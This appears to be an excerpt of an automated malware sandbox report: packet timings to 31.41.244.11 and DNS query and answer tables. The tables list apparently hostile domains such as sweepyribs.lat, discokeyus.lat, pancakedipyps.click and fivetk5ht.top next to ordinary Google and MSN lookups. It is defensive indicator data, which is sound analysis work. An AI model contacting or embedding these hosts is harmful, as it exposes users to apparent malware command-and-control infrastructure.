                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.982774019 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.982816935 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.983725071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.983812094 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.984210968 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.984263897 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.984900951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.985111952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.985743999 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.985810995 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.986113071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.986124992 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.986176014 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.987230062 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.987463951 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.987471104 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.987503052 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.988470078 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.988631964 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.988694906 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.989588022 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.989692926 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.989767075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.990802050 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.990895987 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.990967035 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.991991043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.992053032 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.992399931 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.992520094 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.993113995 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.993194103 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.993232965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.993520021 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.994288921 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.994365931 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.994859934 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.994927883 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.995467901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.995526075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.995695114 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.995744944 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.996665955 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.996717930 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.996867895 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.997380972 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.997822046 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.997886896 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.998836994 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.998893976 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.999037981 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.999048948 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.999094009 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.000149965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.000205994 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.001383066 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.001394987 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.001441956 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.001456022 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.001658916 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.002532959 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.002616882 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.003824949 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.003837109 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.003848076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.003878117 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.003907919 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.004905939 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.005158901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.005243063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.006069899 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.006129026 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.006907940 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.007046938 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.007211924 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.007302999 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.007356882 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.007400036 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.008398056 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.008519888 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.008723974 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.008826017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.009599924 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.009649992 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.010317087 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.010370016 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.010761976 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.010772943 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.010833025 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.011918068 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.011967897 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.012761116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.012819052 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.013128042 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.013139009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.013190985 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.014385939 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.014395952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.014441967 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.015537024 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.015588999 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.015702963 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.015765905 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.016618967 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.016688108 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.016743898 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.016798973 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.017831087 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.017939091 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.018697977 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.018919945 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.019015074 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.019023895 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.019072056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.020155907 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.020209074 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.020695925 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.020755053 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.021321058 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.021410942 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.021440983 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.021488905 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.022491932 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.022553921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.022608995 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.022670984 CET4991080192.168.2.531.41.244.11

                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:31.143964052 CET192.168.2.51.1.1.10xed25Standard query (0)bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmOA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.161864042 CET192.168.2.51.1.1.10x9fedStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.418961048 CET192.168.2.51.1.1.10x8bc4Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.802476883 CET192.168.2.51.1.1.10xf6b9Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:44.180567980 CET192.168.2.51.1.1.10xef34Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.281325102 CET192.168.2.51.1.1.10x80a5Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:51.440632105 CET192.168.2.51.1.1.10x2e7Standard query (0)frostman.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:55.179616928 CET192.168.2.51.1.1.10x9c63Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:55.179723978 CET192.168.2.51.1.1.10xfbe0Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.975064993 CET192.168.2.51.1.1.10xf1faStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.975155115 CET192.168.2.51.1.1.10x9f1fStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.707995892 CET192.168.2.51.1.1.10xdbc6Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.708116055 CET192.168.2.51.1.1.10x1d94Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.563030005 CET192.168.2.51.1.1.10x5287Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.563363075 CET192.168.2.51.1.1.10xcddbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:08.317353964 CET192.168.2.51.1.1.10xc51cStandard query (0)treehoneyi.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.489396095 CET192.168.2.51.1.1.10xa81Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.489396095 CET192.168.2.51.1.1.10x79f1Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.155971050 CET192.168.2.51.1.1.10x713fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.156508923 CET192.168.2.51.1.1.10x92f5Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:25.553080082 CET192.168.2.51.1.1.10x795bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:25.553220987 CET192.168.2.51.1.1.10x9292Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.095118999 CET192.168.2.51.1.1.10x9416Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.095280886 CET192.168.2.51.1.1.10x11a7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.095398903 CET192.168.2.51.1.1.10xe8a0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.095706940 CET192.168.2.51.1.1.10x67abStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.109441042 CET192.168.2.51.1.1.10xaf65Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.109441996 CET192.168.2.51.1.1.10xf021Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.237049103 CET192.168.2.51.1.1.10x41aaStandard query (0)assets.msn.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.237301111 CET192.168.2.51.1.1.10xc5b3Standard query (0)assets.msn.cn65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.218050957 CET192.168.2.51.1.1.10xb564Standard query (0)staticview.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.218161106 CET192.168.2.51.1.1.10x4d8eStandard query (0)staticview.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.844475985 CET192.168.2.51.1.1.10x2385Standard query (0)fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.844583035 CET192.168.2.51.1.1.10x2266Standard query (0)fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.199860096 CET192.168.2.51.1.1.10x9fb5Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.200105906 CET192.168.2.51.1.1.10xbed0Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:32.981347084 CET192.168.2.51.1.1.10xd8aaStandard query (0)fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:32.981434107 CET192.168.2.51.1.1.10xf16cStandard query (0)fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:36.633028030 CET192.168.2.51.1.1.10xe7dbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:36.633600950 CET192.168.2.51.1.1.10xd269Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.561053991 CET192.168.2.51.1.1.10x63b9Standard query (0)fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.561114073 CET192.168.2.51.1.1.10xe076Standard query (0)fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.492419958 CET192.168.2.51.1.1.10x9202Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.492419958 CET192.168.2.51.1.1.10x8bb4Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:49.378015041 CET192.168.2.51.1.1.10xd824Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:49.574881077 CET192.168.2.51.1.1.10x1b33Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:05.169188976 CET192.168.2.51.1.1.10x53faStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:05.317513943 CET192.168.2.51.1.1.10x9c9dStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:07.529412985 CET192.168.2.51.1.1.10x5cc6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:07.529619932 CET192.168.2.51.1.1.10x94f4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:41.245299101 CET192.168.2.51.1.1.10x8f9Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:41.402522087 CET192.168.2.51.1.1.10x730eStandard query (0)grannyejh.latA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:31.366975069 CET1.1.1.1192.168.2.50xed25Name error (3)bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmOnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.389216900 CET1.1.1.1192.168.2.50x9fedName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:35.798491001 CET1.1.1.1192.168.2.50x8bc4Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:36.197818041 CET1.1.1.1192.168.2.50xf6b9No error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:36.197818041 CET1.1.1.1192.168.2.50xf6b9No error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:44.496609926 CET1.1.1.1192.168.2.50xef34No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:44.496609926 CET1.1.1.1192.168.2.50xef34No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:49.418198109 CET1.1.1.1192.168.2.50x80a5No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:51.674943924 CET1.1.1.1192.168.2.50x2e7No error (0)frostman.shop116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:55.471365929 CET1.1.1.1192.168.2.50x9c63No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:55.471365929 CET1.1.1.1192.168.2.50x9c63No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.512142897 CET1.1.1.1192.168.2.50xf1faNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.848067045 CET1.1.1.1192.168.2.50xdbc6No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.700161934 CET1.1.1.1192.168.2.50xcddbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.709486961 CET1.1.1.1192.168.2.50x5287No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:08.818949938 CET1.1.1.1192.168.2.50xc51cNo error (0)treehoneyi.click172.67.180.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:08.818949938 CET1.1.1.1192.168.2.50xc51cNo error (0)treehoneyi.click104.21.91.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.626267910 CET1.1.1.1192.168.2.50xa81No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.626267910 CET1.1.1.1192.168.2.50xa81No error (0)plus.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.627342939 CET1.1.1.1192.168.2.50x79f1No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.295561075 CET1.1.1.1192.168.2.50x713fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.298409939 CET1.1.1.1192.168.2.50x92f5No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.910913944 CET1.1.1.1192.168.2.50xdb52No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.910913944 CET1.1.1.1192.168.2.50xdb52No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.918689966 CET1.1.1.1192.168.2.50x4ddbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:25.778245926 CET1.1.1.1192.168.2.50x795bNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:25.796103001 CET1.1.1.1192.168.2.50x9292No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.233705997 CET1.1.1.1192.168.2.50x9416No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.233705997 CET1.1.1.1192.168.2.50x9416No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.233858109 CET1.1.1.1192.168.2.50x11a7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.238121986 CET1.1.1.1192.168.2.50x67abNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.238940954 CET1.1.1.1192.168.2.50xe8a0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.238940954 CET1.1.1.1192.168.2.50xe8a0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
